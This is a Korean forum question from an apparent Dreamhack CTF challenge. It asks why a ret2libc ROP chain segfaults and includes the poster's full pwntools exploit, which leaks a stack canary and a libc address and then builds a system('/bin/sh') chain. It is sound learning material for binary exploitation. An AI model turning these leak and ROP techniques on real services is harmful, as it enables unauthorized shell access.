rop 가젯이 스택에 잘 들어갔는데도 stopped with exit code -11 (SIGSEGV) 발생합니다 어떻게 해야 해결 가능 할까요? 다음은 코어파일 분석 결과입니다. 마지막에 3을 전송 하여 리턴주소 속 덮인 rop 가젯을 실행 시킬 생각으로 코드를 작성하였습니다. from pwn import * context.log_level = 'debug' #p = remote("host8.dreamhack.games", 20068) p = process("./chall", env={"LD_PRELOAD": "./libc.so.6"}) lib = ELF("./libc.so.6") def edit(train_idx, payload): p.sendlineafter(b">> ", b"2") p.sendlineafter(b"Enter train number:", str(train_idx).encode()) p.send(payload) def view(train_idx): p.sendlineafter(b">>", b"1") p.sendlineafter("Enter train number:", str(train_idx).encode()) [1] overwrite the bss edit(0, str(2077).encode()) [2] leak the canary payload = b"a" * 0x88 + b"b" edit(1,payload) view(1) p.recvuntil(payload) line = p.recvline().strip() print(f"[raw] {line.hex()}") if len(line) < 7: print("[-] Leak too short!") exit() canary = b"\x00" + line[:7] print(f"[+] canary: {hex(u64(canary))}") [3] leak the libc payload = b"a"* 0x98 edit(1,payload) view(1) p.recvuntil(payload) libc_start_main = p.recv(6) + b"\x00\x00" print(f"libc_start_main: {hex(u64(libc_start_main))}") libc = u64(libc_start_main) libc_base = libc - 0x21ca - 0x28000 print(f"libc_base: {hex(libc_base)}") [4] ROP one_gadget = libc_base + 0x583ec # 0x583f3, 0xef4ce, 0xef52b rop = ROP(lib) pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0] + libc_base system = libc_base + lib.symbols['system'] binsh = next(lib.search(b'/bin/sh')) + libc_base ret = next(lib.search(asm("ret"))) + libc_base print(f"[+] pop rdi; ret gadget : {hex(pop_rdi)}") print(f"[+] system() address : {hex(system)}") print(f"[+] \"/bin/sh\" string : {hex(binsh)}") print(f"[+] ret gadget : {hex(ret)}") payload = b"a" * 0x88 + canary + b"a" * 8 + p64(pop_rdi) + p64(binsh) + p64(ret) + p64(system) edit(1,payload) p.interactive() `